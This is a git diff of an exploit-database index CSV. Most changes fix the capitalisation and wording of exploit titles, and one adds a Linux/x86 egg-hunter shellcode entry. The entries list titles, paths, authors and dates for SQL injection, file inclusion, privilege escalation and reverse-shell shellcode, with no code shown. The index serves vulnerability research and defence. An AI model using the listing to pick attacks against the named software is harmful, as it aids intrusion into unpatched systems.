diff --git a/files.csv b/files.csv index 598fb8485..62393350c 100755 --- a/files.csv +++ b/files.csv @@ -8164,7 +8164,7 @@ id,file,description,date,author,platform,type,port 33360,platforms/windows/local/33360.c,"Avast! AntiVirus 4.8.1356 - 'aswRdr.sys' Driver Privilege Escalation",2009-11-16,Evilcry,windows,local,0 33387,platforms/linux/local/33387.txt,"Nagios Plugins check_dhcp 2.0.1 - Arbitrary Option File Read",2014-05-16,"Dawid Golunski",linux,local,0 33395,platforms/linux/local/33395.txt,"Linux Kernel 2.6.x - Ext4 'move extents' ioctl Privilege Escalation",2009-11-09,"Akira Fujita",linux,local,0 -40823,platforms/windows/local/40823.txt,"Microsoft Windows Kernel win32k.sys - 'NtSetWindowLongPtr' Privilege Escalation (MS16-135)",2016-11-24,IOactive,windows,local,0 +40823,platforms/windows/local/40823.txt,"Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135)",2016-11-24,IOactive,windows,local,0 33508,platforms/linux/local/33508.txt,"GNU Bash 4.0 - 'ls' Control Character Command Injection",2010-01-13,"Eric Piel",linux,local,0 33516,platforms/linux/local/33516.c,"Linux Kernel 3.14-rc1 <= 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0 33572,platforms/unix/local/33572.txt,"IBM DB2 - 'REPEAT()' Heap Buffer Overflow",2010-01-27,"Evgeny Legerov",unix,local,0 @@ -8658,7 +8658,7 @@ id,file,description,date,author,platform,type,port 40807,platforms/windows/local/40807.txt,"Huawei UTPS - Unquoted Service Path Privilege Escalation",2016-11-22,"Dhruv Shah",windows,local,0 40810,platforms/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,linux,local,0 40811,platforms/linux/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,linux,local,0 -40812,platforms/linux/local/40812.c,"Linux Kenrel 2.6.10 < 2.6.31.5 - 'pipe.c' Privilege Escalation",2013-12-16,spender,linux,local,0 +40812,platforms/linux/local/40812.c,"Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Privilege Escalation",2013-12-16,spender,linux,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -9530,7 +9530,7 @@ id,file,description,date,author,platform,type,port 4909,platforms/windows/remote/4909.html,"Macrovision FlexNet DownloadManager - Insecure Methods",2008-01-14,Elazar,windows,remote,0 4913,platforms/windows/remote/4913.html,"Macrovision FlexNet - 'isusweb.dll' DownloadAndExecute Method Exploit",2008-01-15,Elazar,windows,remote,0 4918,platforms/windows/remote/4918.html,"RTS Sentry Digital Surveillance - 'CamPanel.dll 2.1.0.2' Buffer Overflow",2008-01-16,rgod,windows,remote,0 -4923,platforms/windows/remote/4923.txt,"miniweb 0.8.19 - Multiple Vulnerabilities",2008-01-16,"Hamid Ebadi",windows,remote,0 +4923,platforms/windows/remote/4923.txt,"Miniweb 0.8.19 - Multiple Vulnerabilities",2008-01-16,"Hamid Ebadi",windows,remote,0 4932,platforms/windows/remote/4932.html,"Digital Data Communications - 'RtspVaPgCtrl' Class Remote Buffer Overflow",2008-01-17,rgod,windows,remote,0 4934,platforms/windows/remote/4934.c,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065)",2008-01-18,"Marcin Kozlowski",windows,remote,0 4941,platforms/hardware/remote/4941.txt,"Belkin Wireless G Plus MIMO Router F5D9230-4 - Authentication Bypass",2008-01-20,DarkFig,hardware,remote,0 @@ -9610,7 +9610,7 @@ id,file,description,date,author,platform,type,port 5519,platforms/windows/remote/5519.c,"VideoLAN VLC Media Player 0.8.6d - httpd_FileCallBack Remote Format String",2008-04-28,EpiBite,windows,remote,0 5530,platforms/windows/remote/5530.html,"Microsoft Works 7 - 'WkImgSrv.dll' ActiveX Remote Buffer Overflow",2008-05-02,lhoang8500,windows,remote,0 5534,platforms/multiple/remote/5534.txt,"HLDS WebMod 0.48 - Multiple Remote Vulnerabilities",2008-05-03,"Luigi Auriemma",multiple,remote,0 -5536,platforms/windows/remote/5536.php,"HLDS WebMod 0.48 - (rconpass) Remote Heap Overflow",2008-05-03,SkOd,windows,remote,0 +5536,platforms/windows/remote/5536.php,"HLDS WebMod 0.48 - 'rconpass' Remote Heap Overflow",2008-05-03,SkOd,windows,remote,0 5563,platforms/windows/remote/5563.pl,"TFTP Server for Windows 1.4 - ST Remote BSS Overflow",2008-05-08,tixxDZ,windows,remote,69 5612,platforms/windows/remote/5612.html,"idautomation bar code ActiveX - Multiple Vulnerabilities",2008-05-14,shinnai,windows,remote,0 5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer - (Print Table of Links) Cross-Zone Scripting (PoC)",2008-05-14,"Aviv Raff",windows,remote,0 @@ -11636,7 +11636,7 @@ id,file,description,date,author,platform,type,port 20273,platforms/cgi/remote/20273.txt,"Moreover CGI script - File Disclosure",2000-10-02,CDI,cgi,remote,0 20277,platforms/cgi/remote/20277.txt,"Armada Design Master Index 1.0 - Directory Traversal",2000-07-18,pestilence,cgi,remote,0 20279,platforms/cgi/remote/20279.txt,"extropia webstore 1.0/2.0 - Directory Traversal",2000-10-09,f0bic,cgi,remote,0 -20280,platforms/cgi/remote/20280.txt,"bytes interactive Web shopper 1.0/2.0 - Directory Traversal",2000-10-08,f0bic,cgi,remote,0 +20280,platforms/cgi/remote/20280.txt,"Bytes interactive Web shopper 1.0/2.0 - Directory Traversal",2000-10-08,f0bic,cgi,remote,0 20281,platforms/cgi/remote/20281.txt,"hassan Consulting shopping cart 1.18 - Directory Traversal",2000-10-07,f0bic,cgi,remote,0 20283,platforms/windows/remote/20283.txt,"Microsoft Windows 9x / ME - Share Level Password Bypass (1)",2000-10-10,stickler,windows,remote,0 20284,platforms/windows/remote/20284.txt,"Microsoft Windows 9x / ME - Share Level Password Bypass (2)",2000-10-10,"Gabriel Maggiotti",windows,remote,0 @@ -11960,7 +11960,7 @@ id,file,description,date,author,platform,type,port 21002,platforms/multiple/remote/21002.txt,"Apache 1.3 - Possible Directory Index Disclosure",2001-07-10,Kevin,multiple,remote,0 21003,platforms/windows/remote/21003.txt,"Microsoft Outlook 98/2000/2002 - Unauthorized Email Access",2001-07-12,"Georgi Guninski",windows,remote,0 21004,platforms/windows/remote/21004.txt,"Microsoft Outlook 98/2000/2002 - Arbitrary Code Execution",2001-07-12,"Georgi Guninski",windows,remote,0 -21008,platforms/cgi/remote/21008.txt,"interactive story 1.3 - Directory Traversal",2001-07-15,qDefense,cgi,remote,0 +21008,platforms/cgi/remote/21008.txt,"Interactive story 1.3 - Directory Traversal",2001-07-15,qDefense,cgi,remote,0 21009,platforms/windows/remote/21009.c,"ArGoSoft FTP Server 1.2.2.2 - Weak Password Encryption",2001-07-12,byterage,windows,remote,0 21011,platforms/hardware/remote/21011.pl,"3Com SuperStack II PS Hub 40 - TelnetD Weak Password Protection",2001-07-12,Siberian,hardware,remote,0 21015,platforms/hardware/remote/21015.pl,"Check Point Firewall-1 4 Securemote - Network Information Leak",2001-07-17,"Haroon Meer & Roelof Temmingh",hardware,remote,0 @@ -15552,6 +15552,7 @@ id,file,description,date,author,platform,type,port 40387,platforms/hardware/shellcode/40387.nasm,"Cisco ASA - Authentication Bypass 'EXTRABACON' (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",hardware,shellcode,0 27132,platforms/hardware/shellcode/27132.txt,"MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",hardware,shellcode,0 27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM - Bind Shell (Port 4444) Shellcode",2013-07-28,"Matthew Graeber",arm,shellcode,0 +40827,platforms/lin_x86/shellcode/40827.c,"Linux/x86 - Egg-hunter Shellcode (25 bytes)",2016-11-25,"Filippo Bersani",lin_x86,shellcode,0 28474,platforms/lin_x86/shellcode/28474.c,"Linux/x86 - Multi-Egghunter Shellcode",2013-09-23,"Ryan Fenno",lin_x86,shellcode,0 40334,platforms/win_x86/shellcode/40334.c,"Windows x86 - Persistent Reverse Shell TCP (494 Bytes)",2016-09-05,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 28996,platforms/windows/shellcode/28996.c,"Windows - Messagebox Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",windows,shellcode,0 @@ -16100,10 +16101,10 @@ id,file,description,date,author,platform,type,port 1785,platforms/php/webapps/1785.php,"Sugar Suite Open Source 4.2 - (OptimisticLock) Remote Exploit",2006-05-14,rgod,php,webapps,0 1789,platforms/php/webapps/1789.txt,"TR Newsportal 0.36tr1 - 'poll.php' Remote File Inclusion",2006-05-15,Kacper,php,webapps,0 1790,platforms/php/webapps/1790.txt,"Squirrelcart 2.2.0 - (cart_content.php) Remote File Inclusion",2006-05-15,OLiBekaS,php,webapps,0 -1793,platforms/php/webapps/1793.pl,"DeluxeBB 1.06 - (name) SQL Injection (mq=off)",2006-05-15,KingOfSka,php,webapps,0 +1793,platforms/php/webapps/1793.pl,"DeluxeBB 1.06 - 'name' Parameter SQL Injection (mq=off)",2006-05-15,KingOfSka,php,webapps,0 1795,platforms/php/webapps/1795.txt,"ezusermanager 1.6 - Remote File Inclusion",2006-05-15,OLiBekaS,php,webapps,0 1796,platforms/php/webapps/1796.php,"PHP-Fusion 6.00.306 - 'srch_where' Parameter SQL Injection",2006-05-16,rgod,php,webapps,0 -1797,platforms/php/webapps/1797.php,"DeluxeBB 1.06 - (Attachment mod_mime) Remote Exploit",2006-05-16,rgod,php,webapps,0 +1797,platforms/php/webapps/1797.php,"DeluxeBB 1.06 - 'Attachment mod_mime' Remote Exploit",2006-05-16,rgod,php,webapps,0 1798,platforms/php/webapps/1798.txt,"Quezza BB 1.0 - (quezza_root_path) File Inclusion",2006-05-17,nukedx,php,webapps,0 1800,platforms/php/webapps/1800.txt,"ScozNews 1.2.1 - (mainpath) Remote File Inclusion",2006-05-17,Kacper,php,webapps,0 1804,platforms/php/webapps/1804.txt,"phpBazar 2.1.0 - Remote File Inclusion / Authentication Bypass",2006-05-19,[Oo],php,webapps,0 @@ -16197,7 +16198,7 @@ id,file,description,date,author,platform,type,port 1912,platforms/php/webapps/1912.txt,"The Bible Portal Project 2.12 - (destination) File Inclusion",2006-06-14,Kacper,php,webapps,0 1913,platforms/php/webapps/1913.txt,"PHP Blue Dragon CMS 2.9.1 - (template.php) File Inclusion",2006-06-14,"Federico Fazzi",php,webapps,0 1914,platforms/php/webapps/1914.txt,"Content-Builder (CMS) 0.7.2 - Multiple Include Vulnerabilities",2006-06-14,Kacper,php,webapps,0 -1916,platforms/php/webapps/1916.txt,"DeluxeBB 1.06 - (templatefolder) Remote File Inclusion",2006-06-15,"Andreas Sandblad",php,webapps,0 +1916,platforms/php/webapps/1916.txt,"DeluxeBB 1.06 - 'templatefolder' Parameter Remote File Inclusion",2006-06-15,"Andreas Sandblad",php,webapps,0 1918,platforms/php/webapps/1918.php,"Bitweaver 1.3 - (tmpImagePath) Attachment mod_mime Exploit",2006-06-15,rgod,php,webapps,0 1919,platforms/php/webapps/1919.txt,"CMS Faethon 1.3.2 - (mainpath) Remote File Inclusion",2006-06-16,K-159,php,webapps,0 1920,platforms/php/webapps/1920.php,"Mambo 4.6rc1 - (Weblinks) Blind SQL Injection (1)",2006-06-17,rgod,php,webapps,0 @@ -16225,11 +16226,11 @@ id,file,description,date,author,platform,type,port 1950,platforms/php/webapps/1950.pl,"MyBulletinBoard (MyBB) 1.1.3 - 'usercp.php' Create Admin Exploit",2006-06-25,Hessam-x,php,webapps,0 1951,platforms/php/webapps/1951.txt,"MagNet BeeHive CMS (header) - Remote File Inclusion",2006-06-25,Kw3[R]Ln,php,webapps,0 1952,platforms/php/webapps/1952.txt,"THoRCMS 1.3.1 - 'phpbb_root_path' Remote File Inclusion",2006-06-25,Kw3[R]Ln,php,webapps,0 -1953,platforms/php/webapps/1953.pl,"DeluxeBB 1.07 - (cp.php) Create Admin Exploit",2006-06-25,Hessam-x,php,webapps,0 +1953,platforms/php/webapps/1953.pl,"DeluxeBB 1.07 - Remote Create Admin",2006-06-25,Hessam-x,php,webapps,0 1954,platforms/php/webapps/1954.pl,"DreamAccount 3.1 - (auth.api.php) Remote File Inclusion",2006-06-25,CrAsh_oVeR_rIdE,php,webapps,0 1955,platforms/php/webapps/1955.txt,"Mambo Module CBSms 1.0 - Remote File Inclusion",2006-06-26,Kw3[R]Ln,php,webapps,0 1956,platforms/php/webapps/1956.txt,"Mambo Component Pearl 1.6 - Multiple Remote File Inclusion",2006-06-27,Kw3[R]Ln,php,webapps,0 -1957,platforms/php/webapps/1957.pl,"Scout Portal Toolkit 1.4.0 - (forumid) SQL Injection",2006-06-27,simo64,php,webapps,0 +1957,platforms/php/webapps/1957.pl,"Scout Portal Toolkit 1.4.0 - 'forumid' Parameter SQL Injection",2006-06-27,simo64,php,webapps,0 1959,platforms/php/webapps/1959.txt,"RsGallery2 <= 1.11.2 - (rsgallery.html.php) File Inclusion",2006-06-28,marriottvn,php,webapps,0 1960,platforms/php/webapps/1960.php,"Blog:CMS 4.0.0k - SQL Injection",2006-06-28,rgod,php,webapps,0 1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module - (lid) SQL Injection",2006-06-28,KeyCoder,php,webapps,0 @@ -16395,7 +16396,7 @@ id,file,description,date,author,platform,type,port 2215,platforms/php/webapps/2215.txt,"Joomla! Component Kochsuite 0.9.4 - Remote File Inclusion",2006-08-18,camino,php,webapps,0 2216,platforms/php/webapps/2216.txt,"Sonium Enterprise Adressbook 0.2 - (folder) Include",2006-08-18,"Philipp Niedziela",php,webapps,0 2217,platforms/php/webapps/2217.txt,"Mambo Component cropimage 1.0 - Remote File Inclusion",2006-08-19,"Mehmet Ince",php,webapps,0 -2218,platforms/php/webapps/2218.txt,"interact 2.2 - (CONFIG[base_path]) Remote File Inclusion",2006-08-19,Kacper,php,webapps,0 +2218,platforms/php/webapps/2218.txt,"Interact 2.2 - 'CONFIG[base_path]' Remote File Inclusion",2006-08-19,Kacper,php,webapps,0 2219,platforms/php/webapps/2219.php,"Joomla! Component Poll 1.0.10 - Arbitrary Add Votes Exploit",2006-08-19,trueend5,php,webapps,0 2220,platforms/php/webapps/2220.txt,"Tutti Nova 1.6 - (TNLIB_DIR) Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0 2221,platforms/php/webapps/2221.txt,"Fantastic News 2.1.3 - (script_path) Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0 @@ -17996,7 +17997,7 @@ id,file,description,date,author,platform,type,port 4658,platforms/php/webapps/4658.php,"RunCMS 1.6 - disclaimer.php Remote File Overwrite",2007-11-25,BugReport.IR,php,webapps,0 4659,platforms/php/webapps/4659.txt,"IAPR COMMENCE 1.3 - Multiple Remote File Inclusion",2007-11-25,ShAy6oOoN,php,webapps,0 4660,platforms/php/webapps/4660.pl,"Softbiz Freelancers Script 1 - SQL Injection",2007-11-25,"Khashayar Fereidani",php,webapps,0 -4661,platforms/php/webapps/4661.py,"DeluxeBB 1.09 - Remote Admin Email Change Exploit",2007-11-26,nexen,php,webapps,0 +4661,platforms/php/webapps/4661.py,"DeluxeBB 1.09 - Remote Admin Email Change",2007-11-26,nexen,php,webapps,0 4662,platforms/php/webapps/4662.txt,"Tilde CMS 4.x - (aarstal) SQL Injection",2007-11-26,KiNgOfThEwOrLd,php,webapps,0 4665,platforms/php/webapps/4665.txt,"Eurologon CMS - Multiple SQL Injections",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 4666,platforms/php/webapps/4666.txt,"Eurologon CMS - files.php Arbitrary File Download",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 @@ -18609,7 +18610,7 @@ id,file,description,date,author,platform,type,port 5504,platforms/php/webapps/5504.txt,"PHP Forge 3 Beta 2 - 'id' Parameter SQL Injection",2008-04-26,JIKO,php,webapps,0 5505,platforms/php/webapps/5505.txt,"RunCMS Module MyArticles 0.6 Beta-1 - SQL Injection",2008-04-26,Cr@zy_King,php,webapps,0 5506,platforms/php/webapps/5506.txt,"PHPizabi 0.848b C1 HFP3 - Database Information Disclosure",2008-04-26,YOUCODE,php,webapps,0 -5507,platforms/asp/webapps/5507.txt,"megabbs forum 2.2 - SQL Injection / Cross-Site Scripting",2008-04-27,BugReport.IR,asp,webapps,0 +5507,platforms/asp/webapps/5507.txt,"Megabbs Forum 2.2 - SQL Injection / Cross-Site Scripting",2008-04-27,BugReport.IR,asp,webapps,0 5508,platforms/php/webapps/5508.txt,"Jokes Site Script - 'jokes.php' SQL Injection",2008-04-27,ProgenTR,php,webapps,0 5509,platforms/php/webapps/5509.txt,"FluentCMS - 'view.php' SQL Injection",2008-04-27,cO2,php,webapps,0 5510,platforms/php/webapps/5510.txt,"Content Management System for Phprojekt 0.6.1 - File Disclosure",2008-04-27,Houssamix,php,webapps,0 @@ -18622,30 +18623,30 @@ id,file,description,date,author,platform,type,port 5521,platforms/php/webapps/5521.txt,"SugarCRM Community Edition 4.5.1/5.0.0 - File Disclosure",2008-04-29,"Roberto Suggi Liverani",php,webapps,0 5522,platforms/php/webapps/5522.txt,"LokiCMS 0.3.3 - Arbitrary File Delete",2008-04-29,cOndemned,php,webapps,0 5523,platforms/php/webapps/5523.txt,"Project Based Calendaring System (PBCS) 0.7.1 - Multiple Vulnerabilities",2008-04-30,GoLd_M,php,webapps,0 -5524,platforms/php/webapps/5524.txt,"OxYProject 0.85 - (edithistory.php) Remote Code Execution",2008-04-30,GoLd_M,php,webapps,0 +5524,platforms/php/webapps/5524.txt,"OxYProject 0.85 - 'edithistory.php' Remote Code Execution",2008-04-30,GoLd_M,php,webapps,0 5525,platforms/php/webapps/5525.txt,"Harris WapChat 1 - Multiple Remote File Inclusion",2008-04-30,k1n9k0ng,php,webapps,0 -5526,platforms/php/webapps/5526.txt,"interact 2.4.1 - Multiple Remote File Inclusion",2008-04-30,RoMaNcYxHaCkEr,php,webapps,0 -5527,platforms/php/webapps/5527.pl,"Joomla! Component Webhosting - 'catid' Blind SQL Injection",2008-05-01,cO2,php,webapps,0 +5526,platforms/php/webapps/5526.txt,"Interact 2.4.1 - Multiple Remote File Inclusion",2008-04-30,RoMaNcYxHaCkEr,php,webapps,0 +5527,platforms/php/webapps/5527.pl,"Joomla! Component Webhosting - 'catid' Parameter Blind SQL Injection",2008-05-01,cO2,php,webapps,0 5528,platforms/php/webapps/5528.txt,"ActualAnalyzer Lite (free) 2.78 - Local File Inclusion",2008-05-01,"Khashayar Fereidani",php,webapps,0 -5529,platforms/php/webapps/5529.txt,"vlbook 1.21 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities",2008-05-01,"Khashayar Fereidani",php,webapps,0 +5529,platforms/php/webapps/5529.txt,"Vlbook 1.21 - Cross-Site Scripting / Local File Inclusion",2008-05-01,"Khashayar Fereidani",php,webapps,0 5531,platforms/php/webapps/5531.txt,"Open Auto Classifieds 1.4.3b - SQL Injection",2008-05-02,InjEctOr5,php,webapps,0 -5532,platforms/php/webapps/5532.txt,"ItCMS 1.9 - (boxpop.php) Remote Code Execution",2008-05-02,Cod3rZ,php,webapps,0 -5533,platforms/php/webapps/5533.txt,"BlogMe PHP - 'comments.php id' SQL Injection",2008-05-03,His0k4,php,webapps,0 -5535,platforms/php/webapps/5535.txt,"SmartBlog - 'index.php tid' SQL Injection",2008-05-03,His0k4,php,webapps,0 +5532,platforms/php/webapps/5532.txt,"ItCMS 1.9 - 'boxpop.php' Remote Code Execution",2008-05-02,Cod3rZ,php,webapps,0 +5533,platforms/php/webapps/5533.txt,"BlogMe PHP 1.1 - 'comments.php' SQL Injection",2008-05-03,His0k4,php,webapps,0 +5535,platforms/php/webapps/5535.txt,"SmartBlog 1.3 - 'index.php' SQL Injection",2008-05-03,His0k4,php,webapps,0 5537,platforms/php/webapps/5537.txt,"phpDirectorySource 1.1 - Multiple SQL Injections",2008-05-03,InjEctOr5,php,webapps,0 -5538,platforms/php/webapps/5538.txt,"cplinks 1.03 - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-05-04,InjEctOr5,php,webapps,0 -5539,platforms/php/webapps/5539.txt,"ScorpNews 1.0 - (example.php site) Remote File Inclusion",2008-05-04,Silver,php,webapps,0 -5540,platforms/php/webapps/5540.pl,"Scout Portal Toolkit 1.4.0 - (ParentId) SQL Injection",2008-05-04,JosS,php,webapps,0 +5538,platforms/php/webapps/5538.txt,"Cplinks 1.03 - Authentication Bypass / SQL Injection / Cross-Site Scripting",2008-05-04,InjEctOr5,php,webapps,0 +5539,platforms/php/webapps/5539.txt,"ScorpNews 1.0 - 'site' Parameter Remote File Inclusion",2008-05-04,Silver,php,webapps,0 +5540,platforms/php/webapps/5540.pl,"Scout Portal Toolkit 1.4.0 - 'ParentId' Parameter SQL Injection",2008-05-04,JosS,php,webapps,0 5541,platforms/php/webapps/5541.txt,"PostNuke Module pnEncyclopedia 0.2.0 - SQL Injection",2008-05-05,K-159,php,webapps,0 -5542,platforms/php/webapps/5542.txt,"Online Rental Property Script 4.5 - 'pid' SQL Injection",2008-05-05,K-159,php,webapps,0 -5543,platforms/php/webapps/5543.txt,"Anserv Auction XL - 'viewfaqs.php cat' SQL Injection",2008-05-05,K-159,php,webapps,0 -5544,platforms/php/webapps/5544.txt,"Kmita Tellfriend 2.0 - (file) Remote File Inclusion",2008-05-05,K-159,php,webapps,0 -5545,platforms/php/webapps/5545.txt,"Kmita Mail 3.0 - (file) Remote File Inclusion",2008-05-05,K-159,php,webapps,0 -5546,platforms/php/webapps/5546.txt,"BackLinkSpider (cat_id) - SQL Injection",2008-05-05,K-159,php,webapps,0 +5542,platforms/php/webapps/5542.txt,"Online Rental Property Script 4.5 - 'pid' Parameter SQL Injection",2008-05-05,K-159,php,webapps,0 +5543,platforms/php/webapps/5543.txt,"Anserv Auction XL - 'cat' Parameter SQL Injection",2008-05-05,K-159,php,webapps,0 +5544,platforms/php/webapps/5544.txt,"Kmita Tellfriend 2.0 - 'file' Parameter Remote File Inclusion",2008-05-05,K-159,php,webapps,0 +5545,platforms/php/webapps/5545.txt,"Kmita Mail 3.0 - 'file' Parameter Remote File Inclusion",2008-05-05,K-159,php,webapps,0 +5546,platforms/php/webapps/5546.txt,"BackLinkSpider 1.1 - 'cat_id' Parameter SQL Injection",2008-05-05,K-159,php,webapps,0 5548,platforms/php/webapps/5548.txt,"Miniweb 2.0 - 'historymonth' Parameter SQL Injection",2008-05-05,HaCkeR_EgY,php,webapps,0 5549,platforms/php/webapps/5549.txt,"Power Editor 2.0 - Remote File Disclosure / Edit",2008-05-05,"Virangar Security",php,webapps,0 -5550,platforms/php/webapps/5550.php,"deluxebb 1.2 - Multiple Vulnerabilities",2008-05-05,EgiX,php,webapps,0 -5551,platforms/php/webapps/5551.txt,"Pre Shopping Mall 1.1 - (search.php search) SQL Injection",2008-05-06,t0pP8uZz,php,webapps,0 +5550,platforms/php/webapps/5550.php,"DeluxeBB 1.2 - Multiple Vulnerabilities",2008-05-05,EgiX,php,webapps,0 +5551,platforms/php/webapps/5551.txt,"Pre Shopping Mall 1.1 - 'search.php' SQL Injection",2008-05-06,t0pP8uZz,php,webapps,0 5552,platforms/php/webapps/5552.txt,"PHPEasyData 1.5.4 - 'cat_id' SQL Injection",2008-05-06,InjEctOr5,php,webapps,0 5553,platforms/asp/webapps/5553.txt,"FipsCMS - 'print.asp lg' SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0 5554,platforms/php/webapps/5554.php,"Galleristic 1.0 - (index.php cat) SQL Injection",2008-05-07,cOndemned,php,webapps,0 @@ -19114,7 +19115,7 @@ id,file,description,date,author,platform,type,port 6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 - (show.php) SQL Injection",2008-07-20,Mr.SQL,php,webapps,0 6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 - (info_book.asp book_id) Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps,0 6105,platforms/asp/webapps/6105.pl,"HRS Multi - 'picture_pic_bv.asp key' Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps,0 -6107,platforms/php/webapps/6107.txt,"Interact E-Learning System 2.4.1 - (help.php) Local File Inclusion",2008-07-21,DSecRG,php,webapps,0 +6107,platforms/php/webapps/6107.txt,"Interact 2.4.1 - 'help.php' Local File Inclusion",2008-07-21,DSecRG,php,webapps,0 6108,platforms/cgi/webapps/6108.pl,"MojoClassifieds 2.0 - Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 6109,platforms/cgi/webapps/6109.pl,"MojoPersonals - 'mojoClassified.cgi mojo' Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 6110,platforms/cgi/webapps/6110.pl,"MojoJobs - 'mojoJobs.cgi mojo' Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 @@ -20314,7 +20315,7 @@ id,file,description,date,author,platform,type,port 7680,platforms/php/webapps/7680.txt,"ezpack 4.2b2 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-06,!-BUGJACK-!,php,webapps,0 7682,platforms/php/webapps/7682.txt,"RiotPix 0.61 - (Authentication Bypass) SQL Injection",2009-01-06,ZoRLu,php,webapps,0 7683,platforms/php/webapps/7683.pl,"Goople 1.8.2 - (FrontPage.php) Blind SQL Injection",2009-01-06,darkjoker,php,webapps,0 -7686,platforms/php/webapps/7686.txt,"ItCMS 2.1a - (Authentication Bypass) SQL Injection",2009-01-06,certaindeath,php,webapps,0 +7686,platforms/php/webapps/7686.txt,"ItCMS 2.1a - Authentication Bypass",2009-01-06,certaindeath,php,webapps,0 7687,platforms/php/webapps/7687.txt,"playSms 0.9.3 - Multiple Remote / Local File Inclusion",2009-01-06,ahmadbady,php,webapps,0 7689,platforms/php/webapps/7689.txt,"BlogHelper - 'common_db.inc' Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0 7690,platforms/php/webapps/7690.txt,"PollHelper - 'poll.inc' Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0 @@ -20650,7 +20651,7 @@ id,file,description,date,author,platform,type,port 8237,platforms/php/webapps/8237.txt,"facil-cms 0.1rc2 - Multiple Vulnerabilities",2009-03-18,any.zicky,php,webapps,0 8238,platforms/php/webapps/8238.txt,"Advanced Image Hosting (AIH) 2.3 - (gal) Blind SQL Injection",2009-03-18,boom3rang,php,webapps,0 8239,platforms/php/webapps/8239.txt,"Pivot 1.40.6 - Arbitrary File Deletion",2009-03-18,"Alfons Luja",php,webapps,0 -8240,platforms/php/webapps/8240.txt,"DeluxeBB 1.3 - (qorder) SQL Injection",2009-03-18,girex,php,webapps,0 +8240,platforms/php/webapps/8240.txt,"DeluxeBB 1.3 - 'qorder' Parameter SQL Injection",2009-03-18,girex,php,webapps,0 8243,platforms/php/webapps/8243.txt,"Bloginator 1a - (Cookie Bypass / SQL Injection) Multiple Vulnerabilities",2009-03-19,Fireshot,php,webapps,0 8244,platforms/php/webapps/8244.txt,"Bloginator 1a - SQL Injection / Command Injection (via Cookie Bypass Exploit)",2009-03-19,Fireshot,php,webapps,0 8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - Authenticated Command Execution",2009-03-19,"Emory University",cgi,webapps,0 @@ -20899,7 +20900,7 @@ id,file,description,date,author,platform,type,port 8708,platforms/php/webapps/8708.txt,"my-gesuad 0.9.14 - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-05-15,YEnH4ckEr,php,webapps,0 8709,platforms/php/webapps/8709.txt,"Pc4Uploader 9.0 - Blind SQL Injection",2009-05-18,Qabandi,php,webapps,0 8710,platforms/php/webapps/8710.txt,"PHP Dir Submit - (Authentication Bypass) SQL Injection",2009-05-18,snakespc,php,webapps,0 -8711,platforms/php/webapps/8711.txt,"Online Rental Property Script 5.0 - 'pid' SQL Injection",2009-05-18,"UnderTaker HaCkEr",php,webapps,0 +8711,platforms/php/webapps/8711.txt,"Online Rental Property Script 5.0 - 'pid' Parameter SQL Injection",2009-05-18,"UnderTaker HaCkEr",php,webapps,0 8713,platforms/php/webapps/8713.txt,"coppermine photo Gallery 1.4.22 - Multiple Vulnerabilities",2009-05-18,girex,php,webapps,0 8714,platforms/php/webapps/8714.txt,"Flyspeck CMS 6.8 - Local/Remote File Inclusion / Change Add Admin",2009-05-18,ahmadbady,php,webapps,0 8715,platforms/php/webapps/8715.txt,"Pluck 4.6.2 - (langpref) Local File Inclusion",2009-05-18,ahmadbady,php,webapps,0 @@ -21232,7 +21233,7 @@ id,file,description,date,author,platform,type,port 9217,platforms/php/webapps/9217.txt,"E-Xoopport 3.1 Module MyAnnonces - (lid) SQL Injection",2009-07-20,Vrs-hCk,php,webapps,0 9219,platforms/php/webapps/9219.txt,"powerUpload 2.4 - (Authentication Bypass) Insecure Cookie Handling",2009-07-20,InjEctOr5,php,webapps,0 9225,platforms/php/webapps/9225.txt,"AnotherPHPBook (APB) 1.3.0 - (Authentication Bypass) SQL Injection",2009-07-21,n3w7u,php,webapps,0 -9226,platforms/php/webapps/9226.txt,"phpDirectorySource - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-07-21,Moudi,php,webapps,0 +9226,platforms/php/webapps/9226.txt,"phpDirectorySource 1.0 - Cross-Site Scripting / 